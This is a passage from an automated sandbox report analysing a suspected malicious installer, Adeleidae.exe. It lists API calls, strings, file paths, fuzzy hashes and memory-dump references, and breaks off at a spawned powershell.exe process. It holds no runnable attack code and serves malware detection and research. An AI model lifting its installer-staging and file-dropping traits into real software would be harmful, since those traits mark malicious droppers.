Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 4e6aff0cdf26a8240c2caa3ab5eae10a4373f49143cb0f782fa754f2c80184c8
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: AE015E71A40219BADB00DB94DD85FFEBBBCAF55711F10012BBA51B61D0C7B49A058BA4

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(00026800,00000064,000E37D0), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction ID: 97815700fdd75a8fa64cd4b2fc5eb6b0a03b286ae4c71c47182b2025913274cc
Opcode Fuzzy Hash: afeae77a0bcb9b30cd304cf262a1d5eea60d0cf7f315b1f8058d570c1e4d3d01
Instruction Fuzzy Hash: 1801447060020DBFEF249F61DE49FEA3B69AB04304F008039FA45B91D0DBB889558F58

Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CDF8), ref: 00401DD1

Strings

Tahoma, xrefs: 00401DB7

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Tahoma
API String ID: 3808545654-3580928618
Opcode ID: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction ID: 434465042c296b11fe85f1af20959402fdd5081aa20827676714b0861cca44ca
Opcode Fuzzy Hash: 19b2d30e00b512fe454d1cbfc28b544df66b8b4a94fa99dfbc87282a1f03fb40
Instruction Fuzzy Hash: C301A231544640EFE7015BB0EF8AB9A3F74AB66301F208579E581B62E2C9B800559BAE

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction ID: bba7bc1bbfa323a43f965ccea5c6d76089a10f976336bb633e0bf1cd6394a54a
Opcode Fuzzy Hash: 93673c575230451abb0308dee03947b91720819ab8eaafde2c5768f7b1eff422
Instruction Fuzzy Hash: E1219E72800114BBDF216FA5CE49D9E7EB9EF09324F24023AF550762E1C7795E41DBA8

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,000000FF,C:\Windows\resources\0809\gildes.lak,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Windows\resources\0809\gildes.lak,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,000000FF,C:\Windows\resources\0809\gildes.lak,00000400,?,?,00000021), ref: 0040258E

Strings

Copy to C:\Users\Public\Desktop\Bardehvalers.unw, xrefs: 0040257C
C:\Windows\resources\0809\gildes.lak, xrefs: 00402552, 00402575, 00402589, 004025D5

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Windows\resources\0809\gildes.lak$Copy to C:\Users\Public\Desktop\Bardehvalers.unw
API String ID: 3109718747-4159403888
Opcode ID: 124bc1b9933efb7c56f85c679ca816716a721c48624739d77ea3ba7bc55c233f
Instruction ID: 733a5b8a3421de7103486a8e2fd1e7248c9e7ae9f3a69bb90da27b1d5488d101
Opcode Fuzzy Hash: 124bc1b9933efb7c56f85c679ca816716a721c48624739d77ea3ba7bc55c233f
Instruction Fuzzy Hash: E011EB71A01205BBDB10AF718F49A9F3265DF44754F24403BF501F61C2EAFC9D91566D

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1a74f2179679fb2cdf553b0348ac08105bc06b0e0a733d0f1a12f3a9490ff99b
Instruction ID: e4f3909cb7298d305a77c10ae8325f91f27f48586481a57425ae6c27891e8aa9
Opcode Fuzzy Hash: 1a74f2179679fb2cdf553b0348ac08105bc06b0e0a733d0f1a12f3a9490ff99b
Instruction Fuzzy Hash: 8AF0F472600504AFDB01DBE4DE88CEEBBBDEB48311B104476F501F51A1CA74DD018B38

Function 00404970 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404A11
wsprintfW.USER32 ref: 00404A1A
SetDlgItemTextW.USER32(?,0042D268), ref: 00404A2D

Strings

%u.%u%s%s, xrefs: 004049FB

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction ID: def2e14d0b5e9bf745060eb8ff4f21dbd1799345f736686a8e00f38c04d15d9e
Opcode Fuzzy Hash: 7f196247ffa4f5a533f026148308de82019fe3f3f4a3a426db09a444c3bfa401
Instruction Fuzzy Hash: 3811EBB3A441287BDB10957D9C46EAF329C9B85374F250237FA65F31D1D978CC2182E8

Function 00405AB4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\,0040A300,00405B28,C:\,C:\,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Adeleidae.exe"), ref: 00405AC2
CharNextW.USER32(00000000), ref: 00405AC7
CharNextW.USER32(00000000), ref: 00405ADF

Strings

C:\, xrefs: 00405AB5

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CharNext
String ID: C:\
API String ID: 3213498283-3404278061
Opcode ID: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
Instruction ID: 436c1f0355aabbf7f5c4490a59110a45f079eab30ef319f4e1ce96341c160e6f
Opcode Fuzzy Hash: 1b3bb70d064d2828b3f020bf6a5482fb991db3eaf72ecbcdc1d8bf2f545e9475
Instruction Fuzzy Hash: 05F09011A00E2196DF31B6944C85A7B76B8EB95364B04993BE601B72C1E3B87C81CEDA

Function 00405A09 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A0F
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040328D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405A19
lstrcatW.KERNEL32(?,0040A014), ref: 00405A2B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A09

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction ID: 6c4fcacab342d11fcc3e0291a3358bee332e4b98312e181ff459d3a43eef6c86
Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
Instruction Fuzzy Hash: E4D0A771101D306AC211EB548C04DDF72ACAE45344381007BF502B30E1CB7C1D618BFE

Function 00402D8A Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,0040353A,?), ref: 00402D9D
GetTickCount.KERNEL32 ref: 00402DBB
CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
ShowWindow.USER32(00000000,00000005,?,?,00000000,0040353A,?), ref: 00402DE6

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction ID: 14797c98da9828bb931948049190d252b5e763d0d3dd0a8fb7bf7e32741345ac
Opcode Fuzzy Hash: 4531d39793dd689b88ecf9c78e53bc84b8350a2634ed7edc8c543d9bb047c671
Instruction Fuzzy Hash: C9F05430611A20BFC6716B50FF4D98B7B64BB84B11701457AF142B15E8CBB80C418B9C

Function 00403809 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,004037E1,004035F6,?), ref: 00403823
GlobalFree.KERNEL32(?), ref: 0040382A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403809

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction ID: 1a021970d57ae41c51ef9a97853206db199f5c9852ffd88fd16926185a7b9e14
Opcode Fuzzy Hash: 5898abf10019027861f76b75f8a0bd4982bc330ca6c5028dc7fe5a6e65d5b297
Instruction Fuzzy Hash: 72E0EC3350162097C7216F55BD08B6AB7ACAF4DB22F4584BAE880BB2608B745C428BD8

Function 00405A55 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Adeleidae.exe,C:\Users\user\Desktop\Adeleidae.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A5B
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Adeleidae.exe,C:\Users\user\Desktop\Adeleidae.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405A6B

Strings

C:\Users\user\Desktop, xrefs: 00405A55

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction ID: bc07cd37d8a58f62a2b9a6dad95115890aa924a9f687d43278fd1307a4d4e217
Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
Instruction Fuzzy Hash: 7ED05EB2400D209AD312A714DC84DAF77ACEF1530074A446BF441A31A0D7785D918AA9

Function 00405B8F Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1

Memory Dump Source

Source File: 00000000.00000002.1813909041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1813892691.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813926607.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1813949539.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1814096668.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Adeleidae.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

Analysis Process: powershell.exePID: 7424, Parent PID: 7348COMMON

Executed Functions

Function 04CDE260 Relevance: .7, Instructions: 713COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2424730500.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4cd0000_powershell.jbxd

Similarity

